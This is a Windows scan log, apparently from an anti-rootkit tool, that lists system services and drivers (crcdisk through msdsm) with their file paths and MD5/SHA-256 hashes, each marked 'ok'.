23:16:19.0841 0x0e30 [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk C:\windows\system32\drivers\crcdisk.sys
23:16:19.0841 0x0e30 crcdisk - ok
23:16:19.0935 0x0e30 [ 6B400F211BEE880A37A1ED0368776BF4, 2F27C6FA96A1C8CBDA467846DA57E63949A7EA37DB094B13397DDD30114295BD ] CryptSvc C:\windows\system32\cryptsvc.dll
23:16:19.0935 0x0e30 CryptSvc - ok
23:16:20.0044 0x0e30 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] DcomLaunch C:\windows\system32\rpcss.dll
23:16:20.0060 0x0e30 DcomLaunch - ok
23:16:20.0091 0x0e30 [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc C:\windows\System32\defragsvc.dll
23:16:20.0106 0x0e30 defragsvc - ok
23:16:20.0138 0x0e30 [ 9BB2EF44EAA163B29C4A4587887A0FE4, 03667BC3EA5003F4236929C10F23D8F108AFCB29DB5559E751FB26DFB318636F ] DfsC C:\windows\system32\Drivers\dfsc.sys
23:16:20.0153 0x0e30 DfsC - ok
23:16:20.0184 0x0e30 [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp C:\windows\system32\dhcpcore.dll
23:16:20.0200 0x0e30 Dhcp - ok
23:16:20.0216 0x0e30 [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache C:\windows\system32\drivers\discache.sys
23:16:20.0216 0x0e30 discache - ok
23:16:20.0262 0x0e30 [ 9819EEE8B5EA3784EC4AF3B137A5244C, 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427 ] Disk C:\windows\system32\drivers\disk.sys
23:16:20.0262 0x0e30 Disk - ok
23:16:20.0309 0x0e30 [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache C:\windows\System32\dnsrslvr.dll
23:16:20.0309 0x0e30 Dnscache - ok
23:16:20.0340 0x0e30 [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc C:\windows\System32\dot3svc.dll
23:16:20.0340 0x0e30 dot3svc - ok
23:16:20.0372 0x0e30 [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS C:\windows\system32\dps.dll
23:16:20.0372 0x0e30 DPS - ok
23:16:20.0418 0x0e30 [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud C:\windows\system32\drivers\drmkaud.sys
23:16:20.0418 0x0e30 drmkaud - ok
23:16:20.0465 0x0e30 [ 87CE5C8965E101CCCED1F4675557E868, 077D98F0F130B2FC710208BA34016EF2B2506EE2BD71740B228145E34A3046F1 ] DXGKrnl C:\windows\System32\drivers\dxgkrnl.sys
23:16:20.0496 0x0e30 DXGKrnl - ok
23:16:20.0543 0x0e30 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost C:\windows\System32\eapsvc.dll
23:16:20.0543 0x0e30 EapHost - ok
23:16:20.0684 0x0e30 [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv C:\windows\system32\drivers\evbda.sys
23:16:20.0840 0x0e30 ebdrv - ok
23:16:20.0886 0x0e30 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] EFS C:\windows\System32\lsass.exe
23:16:20.0886 0x0e30 EFS - ok
23:16:20.0980 0x0e30 [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr C:\windows\ehome\ehRecvr.exe
23:16:20.0996 0x0e30 ehRecvr - ok
23:16:21.0011 0x0e30 [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched C:\windows\ehome\ehsched.exe
23:16:21.0027 0x0e30 ehSched - ok
23:16:21.0074 0x0e30 [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor C:\windows\system32\drivers\elxstor.sys
23:16:21.0089 0x0e30 elxstor - ok
23:16:21.0105 0x0e30 [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev C:\windows\system32\drivers\errdev.sys
23:16:21.0105 0x0e30 ErrDev - ok
23:16:21.0167 0x0e30 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem C:\windows\system32\es.dll
23:16:21.0183 0x0e30 EventSystem - ok
23:16:21.0214 0x0e30 [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat C:\windows\system32\drivers\exfat.sys
23:16:21.0214 0x0e30 exfat - ok
23:16:21.0230 0x0e30 [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat C:\windows\system32\drivers\fastfat.sys
23:16:21.0245 0x0e30 fastfat - ok
23:16:21.0370 0x0e30 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax C:\windows\system32\fxssvc.exe
23:16:21.0401 0x0e30 Fax - ok
23:16:21.0432 0x0e30 [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc C:\windows\system32\drivers\fdc.sys
23:16:21.0432 0x0e30 fdc - ok
23:16:21.0464 0x0e30 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost C:\windows\system32\fdPHost.dll
23:16:21.0464 0x0e30 fdPHost - ok
23:16:21.0495 0x0e30 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub C:\windows\system32\fdrespub.dll
23:16:21.0495 0x0e30 FDResPub - ok
23:16:21.0510 0x0e30 [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo C:\windows\system32\drivers\fileinfo.sys
23:16:21.0526 0x0e30 FileInfo - ok
23:16:21.0542 0x0e30 [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace C:\windows\system32\drivers\filetrace.sys
23:16:21.0542 0x0e30 Filetrace - ok
23:16:21.0557 0x0e30 [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk C:\windows\system32\drivers\flpydisk.sys
23:16:21.0557 0x0e30 flpydisk - ok
23:16:21.0588 0x0e30 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr C:\windows\system32\drivers\fltmgr.sys
23:16:21.0604 0x0e30 FltMgr - ok
23:16:21.0682 0x0e30 [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] FontCache C:\windows\system32\FntCache.dll
23:16:21.0713 0x0e30 FontCache - ok
23:16:21.0776 0x0e30 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
23:16:21.0776 0x0e30 FontCache3.0.0.0 - ok
23:16:21.0791 0x0e30 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\windows\system32\drivers\FsDepends.sys
23:16:21.0791 0x0e30 FsDepends - ok
23:16:21.0838 0x0e30 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\windows\system32\drivers\Fs_Rec.sys
23:16:21.0838 0x0e30 Fs_Rec - ok
23:16:21.0869 0x0e30 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\windows\system32\DRIVERS\fvevol.sys
23:16:21.0885 0x0e30 fvevol - ok
23:16:21.0916 0x0e30 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\windows\system32\drivers\gagp30kx.sys
23:16:21.0916 0x0e30 gagp30kx - ok
23:16:21.0963 0x0e30 [ FA07EC01952729DDDDC5BF4BAE06B09E, EAD6B6C4D0C2F27C91D3494DD71B549C47104733CD8C8AF77104D4F7F41C18E5 ] GFNEXSrv C:\Windows\System32\GFNEXSrv.exe
23:16:21.0963 0x0e30 GFNEXSrv - ok
23:16:22.0010 0x0e30 [ 277BBC7E1AA1EE957F573A10ECA7EF3A, 2EE60B924E583E847CC24E78B401EF95C69DB777A5B74E1EC963E18D47B94D24 ] gpsvc C:\windows\System32\gpsvc.dll
23:16:22.0041 0x0e30 gpsvc - ok
23:16:22.0134 0x0e30 [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdate C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
23:16:22.0134 0x0e30 gupdate - ok
23:16:22.0150 0x0e30 [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdatem C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
23:16:22.0166 0x0e30 gupdatem - ok
23:16:22.0228 0x0e30 [ 5D4BC124FAAE6730AC002CDB67BF1A1C, 00294F4DC7D17F6DD2A22B9C3299BED40146BA45C972367154D20DB502472551 ] gusvc C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe
23:16:22.0228 0x0e30 gusvc - ok
23:16:22.0275 0x0e30 [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir C:\windows\system32\drivers\hcw85cir.sys
23:16:22.0275 0x0e30 hcw85cir - ok
23:16:22.0306 0x0e30 [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\windows\system32\drivers\HdAudio.sys
23:16:22.0322 0x0e30 HdAudAddService - ok
23:16:22.0353 0x0e30 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus C:\windows\system32\DRIVERS\HDAudBus.sys
23:16:22.0353 0x0e30 HDAudBus - ok
23:16:22.0368 0x0e30 [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt C:\windows\system32\drivers\HidBatt.sys
23:16:22.0384 0x0e30 HidBatt - ok
23:16:22.0400 0x0e30 [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth C:\windows\system32\drivers\hidbth.sys
23:16:22.0400 0x0e30 HidBth - ok
23:16:22.0431 0x0e30 [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr C:\windows\system32\drivers\hidir.sys
23:16:22.0431 0x0e30 HidIr - ok
23:16:22.0462 0x0e30 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv C:\windows\system32\hidserv.dll
23:16:22.0462 0x0e30 hidserv - ok
23:16:22.0509 0x0e30 [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb C:\windows\system32\drivers\hidusb.sys
23:16:22.0509 0x0e30 HidUsb - ok
23:16:22.0540 0x0e30 [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc C:\windows\system32\kmsvc.dll
23:16:22.0540 0x0e30 hkmsvc - ok
23:16:22.0587 0x0e30 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\windows\system32\ListSvc.dll
23:16:22.0602 0x0e30 HomeGroupListener - ok
23:16:22.0634 0x0e30 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\windows\system32\provsvc.dll
23:16:22.0634 0x0e30 HomeGroupProvider - ok
23:16:22.0680 0x0e30 [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD C:\windows\system32\drivers\HpSAMD.sys
23:16:22.0680 0x0e30 HpSAMD - ok
23:16:22.0743 0x0e30 [ 0EA7DE1ACB728DD5A369FD742D6EEE28, 21C489412EB33A12B22290EB701C19BA57006E8702E76F730954F0784DDE9779 ] HTTP C:\windows\system32\drivers\HTTP.sys
23:16:22.0758 0x0e30 HTTP - ok
23:16:22.0774 0x0e30 [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy C:\windows\system32\drivers\hwpolicy.sys
23:16:22.0774 0x0e30 hwpolicy - ok
23:16:22.0805 0x0e30 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt C:\windows\system32\DRIVERS\i8042prt.sys
23:16:22.0821 0x0e30 i8042prt - ok
23:16:22.0883 0x0e30 [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV C:\windows\system32\drivers\iaStorV.sys
23:16:22.0883 0x0e30 iaStorV - ok
23:16:22.0946 0x0e30 [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc C:\windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
23:16:22.0977 0x0e30 idsvc - ok
23:16:23.0024 0x0e30 IEEtwCollectorService - ok
23:16:23.0039 0x0e30 [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp C:\windows\system32\drivers\iirsp.sys
23:16:23.0039 0x0e30 iirsp - ok
23:16:23.0117 0x0e30 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT C:\windows\System32\ikeext.dll
23:16:23.0133 0x0e30 IKEEXT - ok
23:16:23.0414 0x0e30 [ 028E40182A6F0374978C755F85B9F07C, 747B5B4E56076A77C7936B71CE20FD413A1869ACF9E4218A1B8EF8D4E8C82A3B ] IntcAzAudAddService C:\windows\system32\drivers\RTKVHD64.sys
23:16:23.0492 0x0e30 IntcAzAudAddService - ok
23:16:23.0523 0x0e30 [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide C:\windows\system32\drivers\intelide.sys
23:16:23.0538 0x0e30 intelide - ok
23:16:23.0570 0x0e30 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm C:\windows\system32\drivers\intelppm.sys
23:16:23.0570 0x0e30 intelppm - ok
23:16:23.0632 0x0e30 [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum C:\windows\system32\ipbusenum.dll
23:16:23.0632 0x0e30 IPBusEnum - ok
23:16:23.0663 0x0e30 [ C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver C:\windows\system32\DRIVERS\ipfltdrv.sys
23:16:23.0663 0x0e30 IpFilterDriver - ok
23:16:23.0741 0x0e30 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc C:\windows\System32\iphlpsvc.dll
23:16:23.0757 0x0e30 iphlpsvc - ok
23:16:23.0788 0x0e30 [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV C:\windows\system32\drivers\IPMIDrv.sys
23:16:23.0804 0x0e30 IPMIDRV - ok
23:16:23.0819 0x0e30 [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT C:\windows\system32\drivers\ipnat.sys
23:16:23.0819 0x0e30 IPNAT - ok
23:16:23.0850 0x0e30 [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM C:\windows\system32\drivers\irenum.sys
23:16:23.0850 0x0e30 IRENUM - ok
23:16:23.0882 0x0e30 [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp C:\windows\system32\drivers\isapnp.sys
23:16:23.0882 0x0e30 isapnp - ok
23:16:23.0913 0x0e30 [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt C:\windows\system32\drivers\msiscsi.sys
23:16:23.0928 0x0e30 iScsiPrt - ok
23:16:23.0960 0x0e30 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass C:\windows\system32\DRIVERS\kbdclass.sys
23:16:23.0960 0x0e30 kbdclass - ok
23:16:23.0991 0x0e30 [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid C:\windows\system32\drivers\kbdhid.sys
23:16:23.0991 0x0e30 kbdhid - ok
23:16:24.0038 0x0e30 [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] KeyIso C:\windows\system32\lsass.exe
23:16:24.0038 0x0e30 KeyIso - ok
23:16:24.0069 0x0e30 [ 353009DEDF918B2A51414F330CF72DEC, BF157D6E329F26E02FA16271B751B421396040DBB1D7BF9B2E0A21BC569672E2 ] KSecDD C:\windows\system32\Drivers\ksecdd.sys
23:16:24.0069 0x0e30 KSecDD - ok
23:16:24.0100 0x0e30 [ 1C2D8E18AA8FD50CD04C15CC27F7F5AB, 4BA3B0F9F01BD47D66091D3AD86B69A523981D61DFB4D677F2CD39405B2DA989 ] KSecPkg C:\windows\system32\Drivers\ksecpkg.sys
23:16:24.0100 0x0e30 KSecPkg - ok
23:16:24.0131 0x0e30 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk C:\windows\system32\drivers\ksthunk.sys
23:16:24.0131 0x0e30 ksthunk - ok
23:16:24.0162 0x0e30 [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm C:\windows\system32\msdtckrm.dll
23:16:24.0178 0x0e30 KtmRm - ok
23:16:24.0240 0x0e30 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer C:\windows\system32\srvsvc.dll
23:16:24.0256 0x0e30 LanmanServer - ok
23:16:24.0287 0x0e30 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\windows\System32\wkssvc.dll
23:16:24.0287 0x0e30 LanmanWorkstation - ok
23:16:24.0334 0x0e30 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio C:\windows\system32\DRIVERS\lltdio.sys
23:16:24.0334 0x0e30 lltdio - ok
23:16:24.0350 0x0e30 [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc C:\windows\System32\lltdsvc.dll
23:16:24.0365 0x0e30 lltdsvc - ok
23:16:24.0490 0x0e30 [ F993A32249B66C9D622EA5592A8B76B8, EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts C:\windows\System32\lmhsvc.dll
23:16:24.0490 0x0e30 lmhosts - ok
23:16:24.0568 0x0e30 [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC C:\windows\system32\drivers\lsi_fc.sys
23:16:24.0568 0x0e30 LSI_FC - ok
23:16:24.0590 0x0e30 [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS C:\windows\system32\drivers\lsi_sas.sys
23:16:24.0594 0x0e30 LSI_SAS - ok
23:16:24.0614 0x0e30 [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2 C:\windows\system32\drivers\lsi_sas2.sys
23:16:24.0624 0x0e30 LSI_SAS2 - ok
23:16:24.0644 0x0e30 [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI C:\windows\system32\drivers\lsi_scsi.sys
23:16:24.0654 0x0e30 LSI_SCSI - ok
23:16:24.0694 0x0e30 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv C:\windows\system32\drivers\luafv.sys
23:16:24.0694 0x0e30 luafv - ok
23:16:24.0734 0x0e30 [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc C:\windows\system32\Mcx2Svc.dll
23:16:24.0744 0x0e30 Mcx2Svc - ok
23:16:24.0774 0x0e30 [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas C:\windows\system32\drivers\megasas.sys
23:16:24.0784 0x0e30 megasas - ok
23:16:24.0824 0x0e30 [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR C:\windows\system32\drivers\MegaSR.sys
23:16:24.0834 0x0e30 MegaSR - ok
23:16:24.0874 0x0e30 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS C:\windows\system32\mmcss.dll
23:16:24.0874 0x0e30 MMCSS - ok
23:16:24.0904 0x0e30 [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem C:\windows\system32\drivers\modem.sys
23:16:24.0914 0x0e30 Modem - ok
23:16:24.0944 0x0e30 [ B03D591DC7DA45ECE20B3B467E6AADAA, 701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor C:\windows\system32\DRIVERS\monitor.sys
23:16:24.0944 0x0e30 monitor - ok
23:16:24.0984 0x0e30 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass C:\windows\system32\DRIVERS\mouclass.sys
23:16:24.0984 0x0e30 mouclass - ok
23:16:25.0004 0x0e30 [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid C:\windows\system32\DRIVERS\mouhid.sys
23:16:25.0014 0x0e30 mouhid - ok
23:16:25.0054 0x0e30 [ 32E7A3D591D671A6DF2DB515A5CBE0FA, 47CED0B9067AE8BF5EEF60B17ADEE5906BEDCC56E4CB460B7BFBC12BB9A69E63 ] mountmgr C:\windows\system32\drivers\mountmgr.sys
23:16:25.0054 0x0e30 mountmgr - ok
23:16:25.0074 0x0e30 [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio C:\windows\system32\drivers\mpio.sys
23:16:25.0084 0x0e30 mpio - ok
23:16:25.0104 0x0e30 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv C:\windows\system32\drivers\mpsdrv.sys
23:16:25.0104 0x0e30 mpsdrv - ok
23:16:25.0159 0x0e30 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc C:\windows\system32\mpssvc.dll
23:16:25.0175 0x0e30 MpsSvc - ok
23:16:25.0206 0x0e30 [ 1A4F75E63C9FB84B85DFFC6B63FD5404, 01AFA6DBB4CDE55FE4EA05BBE8F753A4266F8D072EA1EE01DB79F5126780C21F ] MRxDAV C:\windows\system32\drivers\mrxdav.sys
23:16:25.0222 0x0e30 MRxDAV - ok
23:16:25.0237 0x0e30 [ A5D9106A73DC88564C825D317CAC68AC, 0457B2AEA4E05A91D0E43F317894A614434D8CEBE35020785387F307E231FBE4 ] mrxsmb C:\windows\system32\DRIVERS\mrxsmb.sys
23:16:25.0253 0x0e30 mrxsmb - ok
23:16:25.0300 0x0e30 [ D711B3C1D5F42C0C2415687BE09FC163, 9B3013AC60BD2D0FF52086658BA5FF486ADE15954A552D7DD590580E8BAE3EFF ] mrxsmb10 C:\windows\system32\DRIVERS\mrxsmb10.sys
23:16:25.0315 0x0e30 mrxsmb10 - ok
23:16:25.0346 0x0e30 [ 9423E9D355C8D303E76B8CFBD8A5C30C, 220B33F120C2DD937FE4D5664F4B581DC0ACF78D62EB56B7720888F67B9644CC ] mrxsmb20 C:\windows\system32\DRIVERS\mrxsmb20.sys
23:16:25.0346 0x0e30 mrxsmb20 - ok
23:16:25.0362 0x0e30 [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci C:\windows\system32\drivers\msahci.sys
23:16:25.0378 0x0e30 msahci - ok
23:16:25.0393 0x0e30 [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm C:\windows\system32\drivers\msdsm.sys
23:16:25.0409 0x0e30 msdsm - ok
